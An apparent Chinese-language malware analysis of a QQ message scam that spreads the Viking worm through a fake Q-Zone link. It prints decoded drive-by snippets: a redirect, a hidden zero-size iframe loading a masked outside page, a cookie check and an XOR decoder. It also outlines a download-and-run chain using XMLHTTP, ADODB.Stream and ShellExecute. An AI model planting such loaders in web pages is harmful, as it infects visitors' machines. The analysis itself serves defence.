QQ信息中传播Worm.Viking.es的这个网页真复杂

简介: QQ信息中传播Worm.Viking.es的这个网页真复杂

QQ收到如下信息:

/------

4*****1(4*****1)  (2006-11-25 17:31:11)

看看我的嗨舞视频~~~~才上传到Q-Zone空间的...是不是有点太露了?

hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**

------/

hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**的内容中有2段代码值得我们注意:

第1段

/------

<meta http-equiv="refresh" content="5; url=hxxp://u*2.sky***99***.***.cn">

------/

5秒钟后自动转到hxxp://u*2.sky***99***.***.cn,网址中的斜杠写反了^_^。

hxxp://u*2.sky***99***.***.cn

的标题是:手机游戏-彩铃-视频-图片_综合性手机娱乐媒体站!支持中国移动_中国联通_中国电信!

其中也包含有与hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**需要注意的第2段代码。

第2段

这是用HTMLShip XP加密过的JavaScript代码,解密后的代码如下:

/--------

<script language=javascript>nP76=5221;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};cH44=2933;sF9=6934;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();zU23=6361;yN80=3794;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();xA39=4936;yE51=77;pO57=2936;bU4=4076;aH63=5218;qF28=9220;gQ34=2078;;_licensed_to_="";</script><iframe src="hxxp://u***2.**3*9*com*.net/mm***/*2****.html" height=0 width=0></iframe>

--------/

主要功能是禁止使用鼠标右键,并引入网页hxxp://u***2.**3*9*com*.net/mm***/*2****.html

hxxp://u***2.**3*9*com*.net/mm***/*2****.html

内容是加密过的JavaScript代码,由于代码很长,这里就不贴出来了,解密后的代码,开头的部分同样是禁止使用鼠标右键,有一个变量值挺有意思:

/--------

_licensed_to_="TEAM iPA";

--------/

接下来的是用Encode加密的VBScript脚本,解密后的脚本代码不贴出来了,主要是使用自定义函数UnEncode()来解密并输出变量hu的值,变量hu的值中包含了多个“浪”字。

解密后的变量hu的值为JavaScript脚本,这是最复杂的部分,使用了setCookie(),getCookie(),register(),Q(),openWin()等自定义函数。

代码从openWin()开始执行,openWin()开始部分的代码如下:

/--------

function openWin(){

var c = getCookie("wangtesta");

if (c != null) {

return;

register("9999ffree");

--------/

利用cookie变量wangtesta来判断是否往下执行脚本,这也提供了一种免疫的方法^_^

如果该cookie变量不存在,则接着用document.write()和unescape()输出迷惑信息:

/--------

Not Found

Sorry!

--------/

然后调用eval()来连接并执行通过调用自定义函数Q()728次解密出来的JavaScript脚本代码。

函数Q()定义如下:

/--------

var Q=function(m)

return String.fromCharCode(m^151);

--------/

该JavaScript脚本代码的功能是利用 Scripting.FileSystemObject、Microsoft.XMLHTTP、Adodb.Stream 下载 文件 u2.exe,保存到 %Windows%,而文件名则由自定义函数gn()随机生成,

/--------

function gn(n)

{var number = Math.random()*n;

return '~tmp'+Math.round(number)+'.exe';}

--------/

文件名为~tmp*.exe,其中的*为数字串,其值范围为~9999,最后通过Shell.Application 的 ShellExecute方法 运行。

u2.exe  瑞星报为 Worm.Viking.es。


相关文章
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
小心QQ信息中的网址传播维金Worm.Win32.Viking.ix/Worm.Viking.pg
|
2月前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
2月前
|
安全 数据安全/隐私保护
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
|
2月前
|
监控 安全 数据安全/隐私保护
一个会下载至少3个Viking等恶意程序的网站
一个会下载至少3个Viking等恶意程序的网站
|
2月前
|
安全 Windows
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
【原创】借助瑞星在线查毒解决Trojan.DL.GPigeon.a和Exploit.HTML.Mht
|
2月前
|
安全 C#
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
|
2月前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
|
2月前
|
安全
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样
传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样
下一篇
无影云桌面